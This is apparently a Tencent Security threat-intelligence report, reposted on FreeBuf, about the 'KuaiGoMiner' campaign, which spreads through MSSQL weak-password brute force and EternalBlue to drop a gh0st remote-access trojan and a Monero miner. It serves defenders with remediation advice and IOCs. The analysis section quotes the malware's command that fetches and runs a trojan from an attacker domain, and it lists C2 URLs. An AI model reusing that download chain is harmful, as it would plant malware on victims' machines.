freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    “快Go矿工”新增MS SQL爆破攻击,上万台电脑中招
    2020-02-20 14:56:38
    所属地 广东省

    一、背景

    腾讯安全威胁情报中心检测到“快Go矿工”更新,该团伙本次更新利用MSSQL弱口令爆破攻击的方式进行传播。“快Go矿工”由御见威胁情报中心于2019年10月发现,最初仅利用“永恒之蓝”漏洞进行攻击传播,因其使用的C2域名中包含“kuai-go”,腾讯安全威胁情报中心将其命名为“快Go矿工”(KuaiGoMiner)。 

    “快Go矿工”最新变种将挖矿程序伪装成系统进程WinInit.exe,截止目前已挖矿获得门罗币47个,市值***2万余元。同时,病毒在攻陷机器上植入的gh0st远控木马,具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能,被攻陷的电脑还会面临机密信息泄露的风险。 

    据腾讯威胁情报中心统计数据,“快Go矿工”(KuaiGoMiner)变种已攻击上万台电脑,受害最严重地区为江苏、山东和广东。

    1.png


    腾讯安全提醒企业用户检查SQL服务器的SA用户口令,切勿配置弱口令登录,快Go矿工入侵后还会使用永恒之蓝系列攻击工具横向传播,植入远控木马,对政企机构信息系统安全构成严重威胁。

    二、漏洞攻击

    “快Go矿工”(KuaiGoMiner) 变种在攻陷的系统下载攻击模块,释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具,释放到C:\Windows\Fonts\usa\目录下。

    2.png


    释放成功后go.vbs首先启动,然后执行go.bat,在go.bat中利用服务管理工具NSSM(释放文件名为svchost.exe)将攻击脚本cmd.bat安装为服务HTTPServers反复执行。 

    cmd.bat请求http[:]//scan.jiancai008.com:88/2020/local.asp和

    http[:]//sex.zhzy999.net/ip2.php获取本机的IP地址,

    请求http[:]//scan.jiancai008.com:88/2020/random.asp获取随机生成的C段和D段为“0.0“的IP地址,然后利用 “永恒之蓝”漏洞攻击工具针对本机同网段IP和随机生成的IP进行扫描攻击。

    3.png

     

    4.png

    三、MSSQL爆破

    近期KuaiGoMiner还利用MSSQL弱口令爆破进行攻击,爆破成功后首先通过shell代码写入vget.vbs作为下载者程序,然后利用vget.vbs下载PE木马sql.exe,下载命令如下:

    C:/Program Files (x86)/Microsoft SQLServer/MSSQL.1/MSSQL/Binn/sqlservr.exe C:/Windows/System32/CScript.exeC:/ProgramData/vget.vbs  http[:]//sex.zhzy999.net/sql.exeC:/ProgramData/taskger.exe 

    sql.exe为gh0st远控木马,该木马控制电脑后,继续下载挖矿木马http[:]//go.jiancai008.com:88/2020/1.rar,然后解压释放文件到目录C:\Windows\Fonts\usa\。

    5.png


    将门罗币挖矿程序WinInit.exe安装为服务”WinIniter”,使用矿池:xmr-eu1.nanopool.org:14433,钱包:4Ao7AGamzR4cs4E4uK5tcFF9TR6ouXMY4LAi64jHGYQZRWYCupQ7coBGzE7BtcHBWvQFreNEMg1s9iws7ejgwZtB1gQ55Uq进行挖矿。 

    6.png


    目前该钱包已挖矿获取门罗币47.169个,折合***28000余元。

    7.png

    四、安全建议

    1.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP服务的账号密码,切勿使用弱口令; 

    2.根据微软公告及时修复以下Windows系统高危漏洞;

    MS17-010永恒之蓝漏洞

    XP、WindowsServer2003、win8等系统访问:

    http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 

    Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 

    建议企业用户使用腾讯T-Sec终端安全管理系统(腾讯御点,下载链接:https://s.tencent.com/product/yd/index.html),个人用户使用腾讯电脑管家进行漏洞扫描和修复。

    8.jpg


    3.企业用户可部署腾讯T-Sec高级威胁检测系统(御界),发现、追踪黑客攻击线索。腾讯T-Sec高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html

    IOCs

    IP

    64.111.27.3

     

    Domain

    sex.zhzy999.net

    scan.jiancai008.com

    s.jiancai008.com

    go.jiancai008.com

     

    URL

    http[:]//sex.zhzy999.net/sql.exe 

    http[:]//go.jiancai008.com:88/2020/1.rar

    http[:]//go.jiancai008.com:88/2020/2.rar

    http[:]//go.jiancai008.com:88/2020/3.rar

     

    MD5

    1a5ba25af9d21f36cf8b3df7d2f55348

    b87af17c857b208fcd801cb724046781

    09bf2fef86d96ec9a1c3be0a020ae498

    57bd72d6dc95ff57b5321a62b9f7cde2

    70d3908f1b9909b7d23ee265e77dd1f9

    1f1bc2ec00db3551d7700c05c87956df

    05c57ccd23ab3f623bf1adda755af226

    # 腾讯安全 # 快Go矿工 # MSSQL弱口令爆破
    本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者